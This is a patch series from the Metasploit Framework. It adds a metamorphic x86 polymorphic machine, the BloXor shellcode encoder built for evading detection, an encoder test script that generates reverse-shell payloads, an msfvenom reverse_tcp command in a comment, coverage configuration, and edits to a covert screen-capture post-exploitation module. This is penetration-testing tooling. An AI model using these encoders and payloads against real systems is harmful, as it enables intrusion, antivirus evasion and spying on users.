primitive_name, *args ) + # If this is the first time this block is being created, create the array to hold the permutation list + if( not @blocks[block_name] ) + @blocks[block_name] = Block.new( block_name ) + end + # Now create a new permutation object for every one supplied. + @primitives[primitive_name].each do | source | + @blocks[block_name] << Permutation.new( block_name, primitive_name, self, source, args ) + end + return block_name + end + + # + # Overloaded by a subclass to create any primitives available in this machine. + # + def _create_primitives + nil + end + + # + # Rex::Poly::Machine::Primitive + # + def _create_primitive( name, *permutations ) + # If this is the first time this primitive is being created, create the array to hold the permutation list + if( not @primitives[name] ) + @primitives[name] = ::Array.new + end + # Add in the permutation object (Rex::Poly::Machine::Primitive) for every one supplied. + permutations.each do | permutation | + @primitives[name] << Primitive.new( permutation ) + end + end + + # + # Helper function to generate a number whoes byte representation is valid in this + # machine (does not contain any badchars for example). Optionally we can supply a + # number and the resulting addition/subtraction of this number against the newly + # generated value is also tested for validity. This helps in the assembly primitives + # which can use these values. + # + def _make_safe_number( bytes, number=nil ) + format = '' + if( bytes == BYTE ) + format = 'C' + elsif( bytes == WORD ) + format = 'v' + elsif( bytes == DWORD ) + format = 'V' + elsif( bytes == QWORD ) + format = 'Q' + else + raise RuntimeError, "Invalid size '#{bytes}' used in _make_safe_number." + end + + goodchars = (0..255).to_a + + @badchars.unpack( 'C*' ).each do | b | + goodchars.delete( b.chr ) + end + + while( true ) do + value = 0 + + 0.upto( bytes-1 ) do | i | + value |= ( (goodchars[ rand(goodchars.length) ] << i*8) & (0xFF << i*8) ) + end + + if( not is_valid?( [ value ].pack(format) ) or not is_valid?( [ ~value ].pack(format) ) ) + redo + end + + if( not number.nil? ) + if( not is_valid?( [ value + number ].pack(format) ) or not is_valid?( [ value - number ].pack(format) ) ) + redo + end + end + + break + end + + return value + end + + end + + end + +end diff --git a/lib/rex/poly/machine/x86.rb b/lib/rex/poly/machine/x86.rb new file mode 100644 index 0000000000..e72d7aa2d7 --- /dev/null +++ b/lib/rex/poly/machine/x86.rb @@ -0,0 +1,508 @@ + +module Rex + + module Poly + + # + # A subclass to represent a Rex poly machine on the x86 architecture. + # + class MachineX86 < Rex::Poly::Machine + + def initialize( badchars='', consume_base_pointer=nil, consume_stack_pointer=true ) + super( badchars, Metasm::Ia32.new ) + + @reg_available << Rex::Arch::X86::EAX + @reg_available << Rex::Arch::X86::EBX + @reg_available << Rex::Arch::X86::ECX + @reg_available << Rex::Arch::X86::EDX + @reg_available << Rex::Arch::X86::ESI + @reg_available << Rex::Arch::X86::EDI + @reg_available << Rex::Arch::X86::EBP + @reg_available << Rex::Arch::X86::ESP + + # By default we consume the EBP register if badchars contains \x00. This helps speed + # things up greatly as many instructions opperating on EBP introduce a NULL byte. For + # example, a MOV instruction with EAX as the source operand is as follows: + # 8B08 mov ecx, [eax] + # but the same instruction with EBP as the source operand is as follows: + # 8B4D00 mov ecx, [ebp] ; This is assembled as 'mov ecx, [ebp+0]' + # we can see that EBP is encoded differently with an offset included. We can still + # try to generate a solution with EBP included and \x00 in the badchars list but + # it can take considerably longer. + if( ( consume_base_pointer.nil? and not Rex::Text.badchar_index( "\x00", @badchars ).nil? ) or consume_base_pointer == true ) + create_variable( 'base_pointer', 'ebp' ) + end + + # By default we consume the ESP register to avoid munging the stack. + if( consume_stack_pointer ) + create_variable( 'stack_pointer', 'esp' ) + end + + # discover all the safe FPU instruction we can use. + @safe_fpu_instructions = ::Array.new + Rex::Arch::X86.fpu_instructions.each do | fpu | + if( is_valid?( fpu ) ) + @safe_fpu_instructions << fpu + end + end + end + + # + # The general purpose registers are 32bit + # + def native_size + Rex::Poly::Machine::DWORD + end + + # + # Overload this method to intercept the 'set' primitive with the 'location' keyword + # and create the block with the '_set_variable_location'. We do this to keep a + # consistent style. + # + def create_block_primitive( block_name, primitive_name, *args ) + if( primitive_name == 'set' and args.length == 2 and args[1] == 'location' ) + _create_block_primitive( block_name, '_set_variable_location', args[0] ) + else + super + end + end + + # + # XXX: If we have a loop primitive, it is a decent speed bump to force the associated variable + # of the first loop primitive to be assigned as ECX (for the x86 LOOP instruction), this is not + # neccasary but can speed generation up significantly. + # + #def generate + # @blocks.each_value do | block | + # if( block.first.primitive == 'loop' ) + # @variables.delete( block.first.args.first ) + # create_variable( block.first.args.first, 'ecx' ) + # break + # end + # end + # # ...go go go + # super + #end + + protected + + # + # Resolve a register number into a suitable register name. + # + def _register_value( regnum, size=nil ) + value = nil + # we default to a native 32 bits if no size is specified. + if( size.nil? ) + size = native_size() + end + + if( size == Rex::Poly::Machine::DWORD ) + value = Rex::Arch::X86::REG_NAMES32[ regnum ] + elsif( size == Rex::Poly::Machine::WORD ) + value = Rex::Arch::X86::REG_NAMES16[ regnum ] + elsif( size == Rex::Poly::Machine::BYTE ) + # (will return nil for ESI,EDI,EBP,ESP) + value = Rex::Arch::X86::REG_NAMES8L[ regnum ] + else + raise RuntimeError, "Register number '#{regnum}' (size #{size.to_i}) is unavailable." + end + return value + end + + # + # Create the x86 primitives. + # + def _create_primitives + + # + # Create the '_set_variable_location' primitive. The first param it the variable to place the current + # blocks location value in. + # + _create_primitive( '_set_variable_location', + ::Proc.new do | block, machine, variable | + if( @safe_fpu_instructions.empty? ) + raise UnallowedPermutation + end + [ + "dw #{ "0x%04X" % [ @safe_fpu_instructions[ rand(@safe_fpu_instructions.length) ].unpack( 'v' ).first ] }", + "mov #{machine.variable_value( 'temp' )}, esp", + "fnstenv [ #{machine.variable_value( 'temp' )} - 12 ]", + "pop #{machine.variable_value( variable )}" + ] + end, + ::Proc.new do | block, machine, variable | + if( @safe_fpu_instructions.empty? ) + raise UnallowedPermutation + end + [ + "dw #{ "0x%04X" % [ @safe_fpu_instructions[ rand(@safe_fpu_instructions.length) ].unpack( 'v' ).first ] }", + "mov #{machine.variable_value( 'temp' )}, esp", + "fnstenv [ #{machine.variable_value( 'temp' )} - 12 ]", + "pop #{machine.variable_value( variable )}" + ] + end, + ::Proc.new do | block, machine, variable | + if( @safe_fpu_instructions.empty? ) + raise UnallowedPermutation + end + [ + "dw #{ "0x%04X" % [ @safe_fpu_instructions[ rand(@safe_fpu_instructions.length) ].unpack( 'v' ).first ] }", + "push esp", + "pop #{machine.variable_value( 'temp' )}", + "fnstenv [ #{machine.variable_value( 'temp' )} - 12 ]", + "pop #{machine.variable_value( variable )}" + ] + end, + ::Proc.new do | block, machine, variable | + if( @safe_fpu_instructions.empty? ) + raise UnallowedPermutation + end + [ + "dw #{ "0x%04X" % [ @safe_fpu_instructions[ rand(@safe_fpu_instructions.length) ].unpack( 'v' ).first ] }", + "fnstenv [ esp - 12 ]", + "pop #{machine.variable_value( variable )}" + ] + end, + ::Proc.new do | block, machine, variable | + [ + "call $+5", + "pop #{machine.variable_value( variable )}", + "push #{machine.block_offset( block ) + 5}", + "pop #{machine.variable_value( 'temp' )}", + "sub #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}" + ] + end, + ::Proc.new do | block, machine, variable | + [ + "db 0xE8, 0xFF, 0xFF, 0xFF, 0xFF, 0xC0", + "pop #{machine.variable_value( variable )}", + "push #{machine.block_offset( block ) + 5}", + "pop #{machine.variable_value( 'temp' )}", + "sub #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}" + ] + end + ) + + # + # Create the 'loop' primitive. The first param it the counter variable which holds the number of + # times to perform the loop. The second param it the destination block to loop to. + # + _create_primitive( 'loop', + ::Proc.new do | block, machine, counter, destination | + if( machine.variable_value( counter ) != Rex::Arch::X86::REG_NAMES32[ Rex::Arch::X86::ECX ] ) + # we raise and UndefinedPermutation exception to indicate that untill a valid register (ECX) is + # chosen we simply can't render this. This lets the machine know we can still try to use this + # permutation and at a later stage the requirements (counter==ecx) may be satisfied. + raise UndefinedPermutation + end + offset = -( machine.block_offset( machine.block_next( block ) ) - machine.block_offset( destination ) ) + Rex::Arch::X86.loop( offset ) + end, + ::Proc.new do | block, machine, counter, destination | + offset = -( machine.block_offset( machine.block_next( block ) ) - machine.block_offset( destination ) ) + [ + "dec #{machine.variable_value( counter )}", + "test #{machine.variable_value( counter )}, #{machine.variable_value( counter )}", + # JNZ destination + "db 0x0F, 0x85 dd #{ "0x%08X" % [ offset & 0xFFFFFFFF ] }" + ] + end + ) + + # + # Create the 'xor' primitive. The first param it the variable to xor with the second param value which + # can be either a variable, literal or block offset. + # + _create_primitive( 'xor', + ::Proc.new do | block, machine, variable, value | + [ + "xor #{machine.variable_value( variable )}, #{machine.resolve_value( value )}" + ] + end, + ::Proc.new do | block, machine, variable, value | + # a ^ b == (a | b) & ~(a & b) + [ + "mov #{machine.variable_value( 'temp' )}, #{machine.variable_value( variable )}", + "or #{machine.variable_value( 'temp' )}, #{machine.resolve_value( value )}", + "and #{machine.variable_value( variable )}, #{machine.resolve_value( value )}", + "not #{machine.variable_value( variable )}", + "and #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}" + ] + end + ) + + # + # Create the 'goto' primitive. The first param is a destination block to jump to. + # + _create_primitive( 'goto', + ::Proc.new do | block, machine, destination | + offset = -( machine.block_offset( machine.block_next( block ) ) - machine.block_offset( destination ) ) + if( ( offset > 0 and offset > 127 ) or ( offset < 0 and offset < -127 ) ) + raise UnallowedPermutation + end + [ + # short relative jump + "db 0xEB db #{ "0x%02X" % [ offset & 0xFF ] }" + ] + end, + ::Proc.new do | block, machine, destination | + offset = -( machine.block_offset( machine.block_next( block ) ) - machine.block_offset( destination ) ) + [ + # near relative jump + "db 0xE9 dd #{ "0x%08X" % [ offset & 0xFFFFFFFF ] }" + ] + end + ) + + # + # Create the 'add' primitive. The first param it the variable which will be added to the second + # param, which may either be a literal number value, a variables assigned register or a block + # name, in which case the block offset will be used. + # + _create_primitive( 'add', + ::Proc.new do | block, machine, variable, value | + if( machine.variable_exist?( value ) ) + raise UnallowedPermutation + end + [ + "lea #{machine.variable_value( variable )}, [ #{machine.variable_value( variable )} + #{machine.resolve_value( value )} ]" + ] + end, + ::Proc.new do | block, machine, variable, value | + [ + "push #{machine.resolve_value( value )}", + "add #{machine.variable_value( variable )}, [esp]", + "pop #{machine.variable_value( 'temp' )}" + ] + end, + ::Proc.new do | block, machine, variable, value | + [ + "add #{machine.variable_value( variable )}, #{machine.resolve_value( value )}" + ] + end, + ::Proc.new do | block, machine, variable, value | + if( machine.variable_exist?( value ) ) + raise UnallowedPermutation + end + [ + "sub #{machine.variable_value( variable )}, #{ "0x%08X" % [ ~(machine.resolve_value( value ) - 1) & 0xFFFFFFFF ] }" + ] + end + # ::Proc.new do | block, machine, variable, value | + # if( machine.variable_exist?( value ) ) + # raise UnallowedPermutation + # end + # [ + # "push #{ "0x%08X" % [ ~(machine.resolve_value( value ) - 1) & 0xFFFFFFFF ] }", + # "pop #{machine.variable_value( 'temp' )}", + # "not #{machine.variable_value( 'temp' )}", + # "add #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}" + # ] + # end, + # ::Proc.new do | block, machine, variable, value | + # if( machine.variable_exist?( value ) ) + # raise UnallowedPermutation + # end + # [ + # "xor #{machine.variable_value( 'temp' )}, #{machine.variable_value( 'temp' )}", + # "mov #{machine.variable_value( 'temp', 16 )}, #{ "0x%04X" % [ ~(machine.resolve_value( value ) - 1) & 0xFFFF ] }", + # "not #{machine.variable_value( 'temp', 16 )}", + # "add #{machine.variable_value( variable )}, #{machine.variable_value( 'temp' )}" + # ] + # end, + ) + + # + # Create the 'set' primitive. The first param it the variable which will be set. the second + # param is the value to set the variable to (a variable, block or literal). + # + _create_primitive( 'set', + ::Proc.new do | block, machine, variable, value | + if( machine.variable_exist?( value ) ) + raise UnallowedPermutation + end + [ + "push #{ "0x%08X" % [ ~machine.resolve_value( value ) & 0xFFFFFFFF ] }", + "pop #{machine.variable_value( variable )}", + "not #{machine.variable_value( variable )}" + ] + end, + ::Proc.new do | block, machine, variable, value | + if( machine.variable_exist?( value ) ) + raise UnallowedPermutation + end + if( machine.resolve_value( value, WORD ) > 0xFFFF ) + raise UndefinedPermutation + end + [ + "xor #{machine.variable_value( variable )}, #{machine.variable_value( variable )}", + "mov #{machine.variable_value( variable, WORD )}, #{ "0x%04X" % [ ~machine.resolve_value( value, WORD ) & 0xFFFF ] }", + "not #{machine.variable_value( variable, WORD )}" + ] + end, + ::Proc.new do | block, machine, variable, value | + [ + "push #{machine.resolve_value( value )}", + "pop #{machine.variable_value( variable )}" + ] + end, + ::Proc.new do | block, machine, variable, value | + [ + "mov #{machine.variable_value( variable )}, #{machine.resolve_value( value )}" + ] + end, + ::Proc.new do | block, machine, variable, value | + if( machine.variable_exist?( value ) ) + raise UnallowedPermutation + end + if( machine.resolve_value( value, WORD ) > 0xFFFF ) + raise UndefinedPermutation + end + [ + "xor #{machine.variable_value( variable )}, #{machine.variable_value( variable )}", + "mov #{machine.variable_value( variable, WORD )}, #{ "0x%04X" % [ machine.resolve_value( value, WORD ) & 0xFFFF ] }" + ] + end, + ::Proc.new do | block, machine, variable, value | + if( machine.variable_exist?( value ) ) + raise UnallowedPermutation + end + dword = machine.make_safe_dword( machine.resolve_value( value ) ) + [ + "mov #{machine.variable_value( variable )}, #{ "0x%08X" % [ dword ] }", + "sub #{machine.variable_value( variable )}, #{ "0x%08X" % [ dword - machine.resolve_value( value ) ] }" + ] + end, + ::Proc.new do | block, machine, variable, value | + if( machine.variable_exist?( value ) ) + raise UnallowedPermutation + end + dword = machine.make_safe_dword( machine.resolve_value( value ) ) + [ + "mov #{machine.variable_value( variable )}, #{ "0x%08X" % [ dword - machine.resolve_value( value ) ] }", + "add #{machine.variable_value( variable )}, #{ "0x%08X" % [ ~dword & 0xFFFFFFFF ] }", + "not #{machine.variable_value( variable )}" + ] + end + ) + + # + # Create the 'load' primitive. The first param it the variable which will be set. The second + # param is the value (either a variable or literal) to load from. the third param is the size + # of the load operation, either DWORD, WORD or BYTE. + # + _create_primitive( 'load', + ::Proc.new do | block, machine, variable, value, size | + result = nil + if( size == Rex::Poly::Machine::DWORD ) + result = [ "mov #{machine.variable_value( variable )}, [#{machine.resolve_value( value )}]" ] + elsif( size == Rex::Poly::Machine::WORD ) + result = [ "movzx #{machine.variable_value( variable )}, word [#{machine.resolve_value( value )}]" ] + elsif( size == Rex::Poly::Machine::BYTE ) + result = [ "movzx #{machine.variable_value( variable )}, byte [#{machine.resolve_value( value )}]" ] + else + raise InvalidPermutation + end + result + end, + ::Proc.new do | block, machine, variable, value, size | + result = nil + if( size == Rex::Poly::Machine::DWORD ) + # we raise and UnallowedPermutation here as this permutation should only satisfy requests for + # sizes of WORD or BYTE, any DWORD requests will be satisfied by the above permutation (otherwise + # we would just be duplicating a 'mov dest, [src]' sequence which is the same as above. + raise UnallowedPermutation + elsif( size == Rex::Poly::Machine::WORD ) + result = [ + "mov #{machine.variable_value( variable )}, [#{machine.resolve_value( value )}]", + "shl #{machine.variable_value( variable )}, 16", + "shr #{machine.variable_value( variable )}, 16" + ] + elsif( size == Rex::Poly::Machine::BYTE ) + result = [ + "mov #{machine.variable_value( variable )}, [#{machine.resolve_value( value )}]", + "shl #{machine.variable_value( variable )}, 24", + "shr #{machine.variable_value( variable )}, 24" + ] + else + raise InvalidPermutation + end + result + end, + ::Proc.new do | block, machine, variable, value, size | + result = nil + if( size == Rex::Poly::Machine::DWORD ) + result = [ + "push [#{machine.resolve_value( value )}]", + "pop #{machine.variable_value( variable )}" + ] + elsif( size == Rex::Poly::Machine::WORD ) + result = [ + "push [#{machine.resolve_value( value )}]", + "pop #{machine.variable_value( variable )}", + "shl #{machine.variable_value( variable )}, 16", + "shr #{machine.variable_value( variable )}, 16" + ] + elsif( size == Rex::Poly::Machine::BYTE ) + result = [ + "push [#{machine.resolve_value( value )}]", + "pop #{machine.variable_value( variable )}", + "shl #{machine.variable_value( variable )}, 24", + "shr #{machine.variable_value( variable )}, 24" + ] + else + raise InvalidPermutation + end + result + end + ) + + # + # Create the 'store' primitive. + # + _create_primitive( 'store', + ::Proc.new do | block, machine, variable, value, size | + result = nil + if( size == Rex::Poly::Machine::DWORD ) + result = [ "mov [#{machine.variable_value( variable )}], #{machine.resolve_value( value )}" ] + elsif( size == Rex::Poly::Machine::WORD ) + result = [ "mov word [#{machine.variable_value( variable )}], #{machine.resolve_value( value, WORD )}" ] + elsif( size == Rex::Poly::Machine::BYTE ) + if( machine.resolve_value( value, BYTE ).nil? ) + # so long as we cant resolve the variable to an 8bit register value (AL,BL,CL,DL) we must raise + # an UndefinedPermutation exception (this will happen when the variable has been assigned to ESI, + # EDI, EBP or ESP which dont have a low byte representation) + raise UndefinedPermutation + end + result = [ "mov byte [#{machine.variable_value( variable )}], #{machine.resolve_value( value, BYTE )}" ] + else + raise InvalidPermutation + end + result + end, + ::Proc.new do | block, machine, variable, value, size | + result = nil + if( size == Rex::Poly::Machine::DWORD ) + result = [ + "push #{machine.resolve_value( value )}", + "pop [#{machine.variable_value( variable )}]" + ] + elsif( size == Rex::Poly::Machine::WORD ) + result = [ + "push #{machine.resolve_value( value, WORD )}", + "pop word [#{machine.variable_value( variable )}]" + ] + else + # we can never do this permutation for BYTE size (or any other size) + raise UnallowedPermutation + end + result + end + ) + end + + end + + end + +end \ No newline at end of file diff --git a/modules/encoders/x86/bloxor.rb b/modules/encoders/x86/bloxor.rb new file mode 100644 index 0000000000..a2577bc89f --- /dev/null +++ b/modules/encoders/x86/bloxor.rb @@ -0,0 +1,58 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'rex/encoder/bloxor/bloxor' + +# +# BloXor is a cross architecture metamorphic block based xor encoder/decoder for Metasploit. +# BloXor was inspired by the Shikata Ga Nai encoder (./msf/modules/encoders/x86/shikata_ga_nai.rb) +# by spoonm and the Rex::Poly::Block (./msf/lib/rex/poly/block.rb) code by skape. +# +# Please refer to ./msf/lib/rex/encoder/bloxor/bloxor.rb for BloXor's implementation and to +# ./msf/lib/rex/poly/machine/machine.rb and ./msf/lib/rex/poly/machine/x86.rb for the +# backend metamorphic stuff. +# +# A presentation at AthCon 2012 by Dimitrios A. Glynos called 'Packing Heat!' discusses a +# metamorphic packer for PE executables and also uses METASM. I am unaware of any code having +# been publicly released for this, so am unable to compare implementations. +# http://census-labs.com/media/packing-heat.pdf +# +# Manually check the output with the following command: +# >ruby msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.2.2 LHOST=192.168.2.1 LPORT=80 -a x86 -e x86/bloxor -b '\x00' -f raw | ndisasm -b32 -k 128,1 - +# + +class Metasploit3 < Rex::Encoder::BloXor + + # Note: Currently set to manual, bump it up to automatically get selected by the framework. + # Note: BloXor by design is slow due to its exhaustive search for a solution. + Rank = ManualRanking + + def initialize + super( + 'Name' => 'BloXor - A Metamorphic Block Based XOR Encoder', + 'Version' => '$Revision$', + 'Description' => 'A Metamorphic Block Based XOR Encoder.', + 'Author' => [ 'sf' ], + 'Arch' => ARCH_X86, + 'License' => MSF_LICENSE, + 'EncoderType' => Msf::Encoder::Type::Unspecified + ) + end + + def compute_decoder( state ) + + @machine = Rex::Poly::MachineX86.new( state.badchars ) + + super( state ) + end + +end diff --git a/test/tests/test_encoders.rb b/test/tests/test_encoders.rb new file mode 100644 index 0000000000..d59df128ea --- /dev/null +++ b/test/tests/test_encoders.rb @@ -0,0 +1,119 @@ +# +# Simple script to test a group of encoders against every exploit in the framework, +# specifically for the exploits badchars, to see if a payload can be encoded. We ignore +# the target arch/platform of the exploit as we just want to pull out real world bad chars. +# + +msfbase = __FILE__ +while File.symlink?(msfbase) + msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +end + +$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib'))) + +require 'fastlib' +require 'msfenv' +require 'msf/base' + +$msf = Msf::Simple::Framework.create + +EXPLOITS = $msf.exploits + +def print_line( message ) + $stdout.puts( message ) +end + +def format_badchars( badchars ) + str = '' + if( badchars ) + badchars.each_byte do | b | + str << "\\x%02X" % [ b ] + end + end + str +end + +def encoder_v_payload( encoder_name, payload, verbose=false ) + success = 0 + fail = 0 + EXPLOITS.each_module do | name, mod | + + exploit = mod.new + print_line( "\n#{encoder_name} v #{name} (#{ format_badchars( exploit.payload_badchars ) })" ) if verbose + begin + encoder = $msf.encoders.create( encoder_name ) + raw = encoder.encode( payload, exploit.payload_badchars, nil, nil ) + success += 1 + rescue + print_line( " FAILED! badchars=#{ format_badchars( exploit.payload_badchars ) }\n" ) if verbose + fail += 1 + end + end + return [ success, fail ] +end + +def generate_payload( name ) + + payload = $msf.payloads.create( name ) + + # set options for a reverse_tcp payload + payload.datastore['LHOST'] = '192.168.2.1' + payload.datastore['RHOST'] = '192.168.2.254' + payload.datastore['RPORT'] = '5432' + payload.datastore['LPORT'] = '4444' + # set options for an exec payload + payload.datastore['CMD'] = 'calc' + # set generic options + payload.datastore['EXITFUNC'] = 'thread' + + return payload.generate +end + +def run( encoders, payload_name, verbose=false ) + + payload = generate_payload( payload_name ) + + table = Rex::Ui::Text::Table.new( + 'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime( "%d-%b-%Y %H:%M:%S" ), + 'Indent' => 4, + 'Columns' => [ 'Encoder Name', 'Success', 'Fail' ] + ) + + encoders.each do | encoder_name | + + success, fail = encoder_v_payload( encoder_name, payload, verbose ) + + table << [ encoder_name, success, fail ] + + end + + return table +end + +if( $0 == __FILE__ ) + + print_line( "[+] Starting.\n" ) + + encoders = [ + 'x86/bloxor', + 'x86/shikata_ga_nai', + 'x86/jmp_call_additive', + 'x86/fnstenv_mov', + 'x86/countdown', + 'x86/call4_dword_xor' + ] + + payload_name = 'windows/shell/reverse_tcp' + + verbose = false + + result_table = run( encoders, payload_name, verbose ) + + print_line( "\n\n#{result_table.to_s}\n\n" ) + + print_line( "[+] Finished.\n" ) +end + + + + \ No newline at end of file From e2ed4f25eba54174f0f87a9d2dbbe40d2d334504 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Fri, 18 Jan 2013 10:02:04 -0600 Subject: [PATCH 004/139] Groups for simplecov report Add Changed group that will show the coverage for any untracked, unstaged, or staged file so developers can more easily see if that their changes are covered. Other groups added for different libraries under lib. --- .simplecov | 50 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 .simplecov diff --git a/.simplecov b/.simplecov new file mode 100644 index 0000000000..d3b12fe6bb --- /dev/null +++ b/.simplecov @@ -0,0 +1,50 @@ +SimpleCov.configure do + # ignore this file + add_filter '.simplecov' + + # + # Changed Files in Git Group + # @see http://fredwu.me/post/35625566267/simplecov-test-coverage-for-changed-files-only + # + + untracked = `git ls-files --exclude-standard --others` + unstaged = `git diff --name-only` + staged = `git diff --name-only --cached` + all = untracked + unstaged + staged + changed_filenames = all.split("\n") + + add_group 'Changed' do |source_file| + changed_filenames.detect { |changed_filename| + source_file.filename.end_with?(changed_filename) + } + end + + # + # Framework (msf) related groups + # + + add_group 'Metasploit Framework', 'lib/msf' + add_group 'Metasploit Framework (Base)', 'lib/msf/base' + add_group 'Metasploit Framework (Core)', 'lib/msf/core' + + # + # Other library groups + # + + add_group 'Fastlib', 'lib/fastlib' + add_group 'Metasm', 'lib/metasm' + add_group 'PacketFu', 'lib/packetfu' + add_group 'Rex', 'lib/rex' + add_group 'RKelly', 'lib/rkelly' + add_group 'Ruby Mysql', 'lib/rbmysql' + add_group 'Ruby Postgres', 'lib/postgres' + add_group 'SNMP', 'lib/snmp' + add_group 'Zip', 'lib/zip' + + # + # Specs are reported on to ensure that all examples are being run and all + # lets, befores, afters, etc are being used. + # + + add_group 'Specs', 'spec' +end From 3c2c808457b1dc3a9ea3bc23d1ad463b10d76b5e Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Fri, 18 Jan 2013 11:12:16 -0600 Subject: [PATCH 005/139] Better Rubymine compatibility for .simplecov Rubymine's code coverage tools separate collection from reporting so that multiple runs can have their data merged. To separate, collecting from reporting, SimpleCov.start is only run when not using Rubymine (as indicated by a lack of the RM_INFO environment variable). This way, `rake spec` will collect coverage info and generate the report as before, but Rubymine will only collect coverage when using 'Run ... with coverage enabled' button and will only generate a report when using 'Generate Coverage Report' as is the intended behavior in Rubymine. --- .simplecov | 8 ++++++++ spec/spec_helper.rb | 6 ------ 2 files changed, 8 insertions(+), 6 deletions(-) diff --git a/.simplecov b/.simplecov index d3b12fe6bb..e8c1b367cf 100644 --- a/.simplecov +++ b/.simplecov @@ -1,3 +1,11 @@ +# RM_INFO is set when using Rubymine. In Rubymine, starting SimpleCov is +# controlled by running with coverage, so don't explicitly start coverage (and +# therefore generate a report) when in Rubymine. This _will_ generate a report +# whenever `rake spec` is run. +unless ENV['RM_INFO'] + SimpleCov.start +end + SimpleCov.configure do # ignore this file add_filter '.simplecov' diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb index cf27db43d6..23c7b0778f 100644 --- a/spec/spec_helper.rb +++ b/spec/spec_helper.rb @@ -11,12 +11,6 @@ $LOAD_PATH.unshift(lib_pathname.to_s) # must be first require and started before any other requires so that it can measure coverage of all following required # code. It is after the rubygems and bundler only because Bundler.setup supplies the LOAD_PATH to simplecov. require 'simplecov' -# Ensure the coverage directory is always the same no matter where the individual spec is in the hierarchy when using -# Rubymine to run one spec. -# -# @see https://github.com/colszowka/simplecov/issues/95 -SimpleCov.root(root_pathname) -SimpleCov.start require 'rspec/core' From 80a0f0694d99c6ac348619394f9af242e8266b0e Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Wed, 30 Jan 2013 00:49:48 -0600 Subject: [PATCH 006/139] add 'auto' & 'none' VIEW_CMD, fixed looting, ch defaults --- modules/post/windows/gather/screen_spy.rb | 89 +++++++++++++++-------- 1 file changed, 59 insertions(+), 30 deletions(-) diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 7b53d9391f..90a88eb02b 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -13,34 +13,40 @@ class Metasploit3 < Msf::Post super( update_info(info, 'Name' => 'Windows Gather Screen Spy', 'Description' => %q{ - This module will incrementally take screenshots of the meterpreter host. This + This module will incrementally take desktop screenshots from the host. This allows for screen spying which can be useful to determine if there is an active user on a machine, or to record the screen for later data extraction. + NOTES: set VIEW_CMD to control how screenshots are opened/displayed, the file name + will be appended directly on to the end of the value of VIEW_CMD (use 'auto' to + have the module do it's best...default browser for Windows, firefox for *nix, and + preview app for macs). 'eog -s -f -w' is a handy VIEW_CMD for *nix. To suppress + opening of screenshots all together, set the VIEW_CMD option to 'none'. }, 'License' => MSF_LICENSE, 'Author' => [ 'Roni Bachar ', # original meterpreter script 'bannedit', # post module - 'kernelsmith ', # record support + 'kernelsmith ', # record/loot support,log x approach, nx 'Adrian Kubok' # better record file names ], - 'Platform' => ['win'], + 'Version' => '$Revision$', + 'Platform' => ['windows'], # @todo add support for posix meterpreter somehow? 'SessionTypes' => ['meterpreter'] )) register_options( [ - OptInt.new('DELAY', [false, 'Interval between screenshots in seconds', 5]), - OptInt.new('COUNT', [false, 'Number of screenshots to collect', 60]), - OptString.new('BROWSER', [false, 'Browser to use for viewing screenshots', 'firefox']), - OptBool.new('RECORD', [false, 'Record all screenshots to disk',false]) + OptInt.new('DELAY', [true, 'Interval between screenshots in seconds', 5]), + OptInt.new('COUNT', [true, 'Number of screenshots to collect', 6]), + OptString.new('VIEW_CMD', [false, 'Command to use for viewing screenshots (auto, none also accepted)', 'auto']), + OptBool.new('RECORD', [true, 'Record all screenshots to disk by looting them',false]) ], self.class) end def run host = session.session_host - screenshot = Msf::Config.install_root + "/data/" + host + ".jpg" + screenshot = Msf::Config.get_config_root + "/logs/" + host + ".jpg" migrate_explorer if session.platform !~ /win32|win64/i @@ -55,46 +61,69 @@ class Metasploit3 < Msf::Post return end - # here we check for the local platform and use default browsers - # linux is the one question mark firefox is not necessarily a - case ::Config::CONFIG['host'] # neat trick to get the local system platform - when /ming/ - cmd = "start #{datastore['BROWSER']} \"file://#{screenshot}\"" - when /linux/ - cmd = "#{datastore['BROWSER']} file://#{screenshot}" - when /apple/ - cmd = "open file://#{screenshot}" # this will use preview + # here we check for the local platform to determine what to do when 'auto' is selected + if datastore['VIEW_CMD'].downcase == 'auto' + case ::RbConfig::CONFIG['host_os'] + when /mac|darwin/ + cmd = "open file://#{screenshot}" # this will use preview usually + when /mswin|win|mingw/ + cmd = "start iexplore.exe \"file://#{screenshot}\"" + when /linux|cygwin/ + # This opens a new tab for each screenshot, but I don't see a better way + cmd = "firefox file://#{screenshot} &" + else # bsd/sun/solaris might be different, but for now... + cmd = "firefox file://#{screenshot} &" + end + elsif datastore['VIEW_CMD'].downcase == 'none' + cmd = nil + else + cmd = "#{datastore['VIEW_CMD']}#{screenshot}" end begin count = datastore['COUNT'] - print_status "Capturing %u screenshots with a delay of %u seconds" % [count, datastore['DELAY']] + print_status "Capturing #{count} screenshots with a delay of #{datastore['DELAY']} seconds" # calculate a sane number of leading zeros to use. log of x is ~ the number of digits - leading_zeros = Math::log(count,10).round + leading_zeros = Math::log10(count).round + file_locations = [] count.times do |num| select(nil, nil, nil, datastore['DELAY']) data = session.espia.espia_image_get_dev_screen if data if datastore['RECORD'] - # let's write it to disk using non-clobbering filename - shot = Msf::Config.install_root + "/data/" + host + ".screenshot.%0#{leading_zeros}d.jpg" % num - ss = ::File.new(shot, 'wb') - ss.write(data) - ss.close + # let's loot it using non-clobbering filename, even tho this is the source filename, not dest + fn = "screenshot.%0#{leading_zeros}d.jpg" % num + file_locations << store_loot("screenspy.screenshot", "application/octet-stream", session, data, fn, "Screenshot") + #shot = 